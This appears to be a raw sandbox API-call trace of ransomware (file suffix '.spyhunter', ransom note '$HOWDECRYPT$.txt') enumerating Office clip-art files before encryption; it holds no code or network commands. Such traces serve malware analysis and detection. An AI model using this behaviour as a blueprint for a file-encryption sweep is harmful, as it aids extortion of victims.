[0098.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2aea8 [0098.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a30) returned 0x2c249b0 [0098.432] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.432] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 67 [0098.432] StrStrIW (lpFirst="J0171847.WMF", lpSrch=".spyhunter") returned 0x0 [0098.432] lstrcmpW (lpString1="J0171847.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.432] lstrcmpW (lpString1="J0171847.WMF", lpString2="_uninstalling_.png") returned 1 [0098.432] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 67 [0098.432] GetProcessHeap () returned 0x2c0000 [0098.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2af78 [0098.432] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a38) returned 0x2c249b0 [0098.433] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.433] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 67 [0098.433] StrStrIW (lpFirst="J0172035.WMF", lpSrch=".spyhunter") returned 0x0 [0098.433] lstrcmpW (lpString1="J0172035.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.433] lstrcmpW (lpString1="J0172035.WMF", lpString2="_uninstalling_.png") returned 1 [0098.433] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172035.WMF") returned 67 [0098.433] GetProcessHeap () returned 0x2c0000 [0098.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b048 [0098.439] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a30) returned 0x2c249b0 [0098.439] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.439] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 67 [0098.439] StrStrIW (lpFirst="J0172067.WMF", lpSrch=".spyhunter") returned 0x0 [0098.439] lstrcmpW (lpString1="J0172067.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.439] lstrcmpW (lpString1="J0172067.WMF", lpString2="_uninstalling_.png") returned 1 [0098.439] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172067.WMF") returned 67 [0098.439] GetProcessHeap () returned 0x2c0000 [0098.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c28758 [0098.439] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a38) returned 0x2c249b0 [0098.439] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.439] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 67 [0098.439] StrStrIW (lpFirst="J0172193.WMF", lpSrch=".spyhunter") returned 0x0 [0098.439] lstrcmpW (lpString1="J0172193.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.440] lstrcmpW (lpString1="J0172193.WMF", lpString2="_uninstalling_.png") returned 1 [0098.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0172193.WMF") returned 67 [0098.440] GetProcessHeap () returned 0x2c0000 [0098.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b118 [0098.440] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a40) returned 0x2c249b0 [0098.440] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.440] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 67 [0098.440] StrStrIW (lpFirst="J0174315.WMF", lpSrch=".spyhunter") returned 0x0 [0098.440] lstrcmpW (lpString1="J0174315.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.440] lstrcmpW (lpString1="J0174315.WMF", lpString2="_uninstalling_.png") returned 1 [0098.440] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174315.WMF") returned 67 [0098.440] GetProcessHeap () returned 0x2c0000 [0098.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b1e8 [0098.440] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a48) returned 0x2c249b0 [0098.440] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.440] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 67 [0098.440] StrStrIW (lpFirst="J0174635.WMF", lpSrch=".spyhunter") returned 0x0 [0098.440] lstrcmpW (lpString1="J0174635.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.441] lstrcmpW (lpString1="J0174635.WMF", lpString2="_uninstalling_.png") returned 1 [0098.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174635.WMF") returned 67 [0098.441] GetProcessHeap () returned 0x2c0000 [0098.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b2b8 [0098.441] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a50) returned 0x2c249b0 [0098.441] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.441] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 67 [0098.441] StrStrIW (lpFirst="J0174639.WMF", lpSrch=".spyhunter") returned 0x0 [0098.441] lstrcmpW (lpString1="J0174639.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.441] lstrcmpW (lpString1="J0174639.WMF", lpString2="_uninstalling_.png") returned 1 [0098.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174639.WMF") returned 67 [0098.441] GetProcessHeap () returned 0x2c0000 [0098.441] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b388 [0098.441] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a58) returned 0x2c249b0 [0098.441] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.441] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 67 [0098.441] StrStrIW (lpFirst="J0174952.JPG", lpSrch=".spyhunter") returned 0x0 [0098.441] lstrcmpW (lpString1="J0174952.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.441] lstrcmpW (lpString1="J0174952.JPG", lpString2="_uninstalling_.png") returned 1 [0098.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0174952.JPG") returned 67 [0098.442] GetProcessHeap () returned 0x2c0000 [0098.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b458 [0098.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a60) returned 0x2c249b0 [0098.442] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.442] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 67 [0098.442] StrStrIW (lpFirst="J0175361.JPG", lpSrch=".spyhunter") returned 0x0 [0098.442] lstrcmpW (lpString1="J0175361.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.442] lstrcmpW (lpString1="J0175361.JPG", lpString2="_uninstalling_.png") returned 1 [0098.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175361.JPG") returned 67 [0098.442] GetProcessHeap () returned 0x2c0000 [0098.442] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b528 [0098.442] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a68) returned 0x2c249b0 [0098.442] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.442] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 67 [0098.442] StrStrIW (lpFirst="J0175428.JPG", lpSrch=".spyhunter") returned 0x0 [0098.442] lstrcmpW (lpString1="J0175428.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.442] lstrcmpW (lpString1="J0175428.JPG", lpString2="_uninstalling_.png") returned 1 [0098.442] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0175428.JPG") returned 67 [0098.443] GetProcessHeap () returned 0x2c0000 [0098.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b5f8 [0098.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a70) returned 0x2c249b0 [0098.443] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.443] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 67 [0098.443] StrStrIW (lpFirst="J0177257.JPG", lpSrch=".spyhunter") returned 0x0 [0098.443] lstrcmpW (lpString1="J0177257.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.443] lstrcmpW (lpString1="J0177257.JPG", lpString2="_uninstalling_.png") returned 1 [0098.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177257.JPG") returned 67 [0098.443] GetProcessHeap () returned 0x2c0000 [0098.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b6c8 [0098.443] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a78) returned 0x2c249b0 [0098.443] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.443] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 67 [0098.443] StrStrIW (lpFirst="J0177806.JPG", lpSrch=".spyhunter") returned 0x0 [0098.443] lstrcmpW (lpString1="J0177806.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.443] lstrcmpW (lpString1="J0177806.JPG", lpString2="_uninstalling_.png") returned 1 [0098.443] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0177806.JPG") returned 67 [0098.444] GetProcessHeap () returned 0x2c0000 [0098.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b798 [0098.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a80) returned 0x2c249b0 [0098.444] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.444] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 67 [0098.444] StrStrIW (lpFirst="J0178348.JPG", lpSrch=".spyhunter") returned 0x0 [0098.444] lstrcmpW (lpString1="J0178348.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.444] lstrcmpW (lpString1="J0178348.JPG", lpString2="_uninstalling_.png") returned 1 [0098.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178348.JPG") returned 67 [0098.444] GetProcessHeap () returned 0x2c0000 [0098.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b868 [0098.444] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a88) returned 0x2c249b0 [0098.444] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.444] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 67 [0098.444] StrStrIW (lpFirst="J0178459.JPG", lpSrch=".spyhunter") returned 0x0 [0098.444] lstrcmpW (lpString1="J0178459.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.444] lstrcmpW (lpString1="J0178459.JPG", lpString2="_uninstalling_.png") returned 1 [0098.444] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178459.JPG") returned 67 [0098.444] GetProcessHeap () returned 0x2c0000 [0098.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2b938 [0098.445] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a90) returned 0x2c249b0 [0098.445] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.445] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 67 [0098.445] StrStrIW (lpFirst="J0178460.JPG", lpSrch=".spyhunter") returned 0x0 [0098.445] lstrcmpW (lpString1="J0178460.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.445] lstrcmpW (lpString1="J0178460.JPG", lpString2="_uninstalling_.png") returned 1 [0098.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178460.JPG") returned 67 [0098.445] GetProcessHeap () returned 0x2c0000 [0098.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2ba08 [0098.445] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2a98) returned 0x2c249b0 [0098.445] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.445] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 67 [0098.445] StrStrIW (lpFirst="J0178523.JPG", lpSrch=".spyhunter") returned 0x0 [0098.445] lstrcmpW (lpString1="J0178523.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.445] lstrcmpW (lpString1="J0178523.JPG", lpString2="_uninstalling_.png") returned 1 [0098.445] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178523.JPG") returned 67 [0098.445] GetProcessHeap () returned 0x2c0000 [0098.445] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bad8 [0098.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2aa0) returned 0x2c249b0 [0098.446] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.446] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 67 [0098.446] StrStrIW (lpFirst="J0178632.JPG", lpSrch=".spyhunter") returned 0x0 [0098.446] lstrcmpW (lpString1="J0178632.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.446] lstrcmpW (lpString1="J0178632.JPG", lpString2="_uninstalling_.png") returned 1 [0098.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178632.JPG") returned 67 [0098.446] GetProcessHeap () returned 0x2c0000 [0098.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bba8 [0098.446] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2aa8) returned 0x2c249b0 [0098.446] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.446] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 67 [0098.446] StrStrIW (lpFirst="J0178639.JPG", lpSrch=".spyhunter") returned 0x0 [0098.446] lstrcmpW (lpString1="J0178639.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.446] lstrcmpW (lpString1="J0178639.JPG", lpString2="_uninstalling_.png") returned 1 [0098.446] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178639.JPG") returned 67 [0098.446] GetProcessHeap () returned 0x2c0000 [0098.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bc78 [0098.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ab0) returned 0x2c249b0 [0098.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.447] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 67 [0098.447] StrStrIW (lpFirst="J0178932.JPG", lpSrch=".spyhunter") returned 0x0 [0098.447] lstrcmpW (lpString1="J0178932.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.447] lstrcmpW (lpString1="J0178932.JPG", lpString2="_uninstalling_.png") returned 1 [0098.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0178932.JPG") returned 67 [0098.447] GetProcessHeap () returned 0x2c0000 [0098.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bd48 [0098.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ab8) returned 0x2c249b0 [0098.447] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.447] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 67 [0098.447] StrStrIW (lpFirst="J0179963.JPG", lpSrch=".spyhunter") returned 0x0 [0098.447] lstrcmpW (lpString1="J0179963.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.447] lstrcmpW (lpString1="J0179963.JPG", lpString2="_uninstalling_.png") returned 1 [0098.447] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0179963.JPG") returned 67 [0098.447] GetProcessHeap () returned 0x2c0000 [0098.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2be18 [0098.447] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ac0) returned 0x2c249b0 [0098.448] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.448] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 67 [0098.448] StrStrIW (lpFirst="J0182689.JPG", lpSrch=".spyhunter") returned 0x0 [0098.448] lstrcmpW (lpString1="J0182689.JPG", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.448] lstrcmpW (lpString1="J0182689.JPG", lpString2="_uninstalling_.png") returned 1 [0098.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182689.JPG") returned 67 [0098.448] GetProcessHeap () returned 0x2c0000 [0098.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bee8 [0098.448] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ac8) returned 0x2c249b0 [0098.448] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.448] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 67 [0098.448] StrStrIW (lpFirst="J0182888.WMF", lpSrch=".spyhunter") returned 0x0 [0098.448] lstrcmpW (lpString1="J0182888.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.448] lstrcmpW (lpString1="J0182888.WMF", lpString2="_uninstalling_.png") returned 1 [0098.448] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182888.WMF") returned 67 [0098.448] GetProcessHeap () returned 0x2c0000 [0098.448] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2bfb8 [0098.448] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ad0) returned 0x2c249b0 [0098.449] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.449] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 67 [0098.449] StrStrIW (lpFirst="J0182898.WMF", lpSrch=".spyhunter") returned 0x0 [0098.449] lstrcmpW (lpString1="J0182898.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.449] lstrcmpW (lpString1="J0182898.WMF", lpString2="_uninstalling_.png") returned 1 [0098.449] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182898.WMF") returned 67 [0098.449] GetProcessHeap () returned 0x2c0000 [0098.449] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c088 [0098.449] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ad8) returned 0x2c249b0 [0098.450] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.450] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 67 [0098.450] StrStrIW (lpFirst="J0182902.WMF", lpSrch=".spyhunter") returned 0x0 [0098.450] lstrcmpW (lpString1="J0182902.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.450] lstrcmpW (lpString1="J0182902.WMF", lpString2="_uninstalling_.png") returned 1 [0098.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182902.WMF") returned 67 [0098.450] GetProcessHeap () returned 0x2c0000 [0098.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c158 [0098.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ae0) returned 0x2c249b0 [0098.450] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.450] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 67 [0098.450] StrStrIW (lpFirst="J0182946.WMF", lpSrch=".spyhunter") returned 0x0 [0098.450] lstrcmpW (lpString1="J0182946.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.450] lstrcmpW (lpString1="J0182946.WMF", lpString2="_uninstalling_.png") returned 1 [0098.450] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0182946.WMF") returned 67 [0098.450] GetProcessHeap () returned 0x2c0000 [0098.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c228 [0098.450] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2ae8) returned 0x2c249b0 [0098.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.451] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 67 [0098.451] StrStrIW (lpFirst="J0183172.WMF", lpSrch=".spyhunter") returned 0x0 [0098.451] lstrcmpW (lpString1="J0183172.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.451] lstrcmpW (lpString1="J0183172.WMF", lpString2="_uninstalling_.png") returned 1 [0098.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183172.WMF") returned 67 [0098.451] GetProcessHeap () returned 0x2c0000 [0098.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c2f8 [0098.451] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c249b0, Size=0x2af0) returned 0x2c249b0 [0098.451] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0098.451] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 67 [0098.451] StrStrIW (lpFirst="J0183174.WMF", lpSrch=".spyhunter") returned 0x0 [0098.451] lstrcmpW (lpString1="J0183174.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0098.451] lstrcmpW (lpString1="J0183174.WMF", lpString2="_uninstalling_.png") returned 1 [0098.451] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0183174.WMF") returned 67 [0098.451] GetProcessHeap () returned 0x2c0000 [0098.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x2c2c3c8 [0098.451] 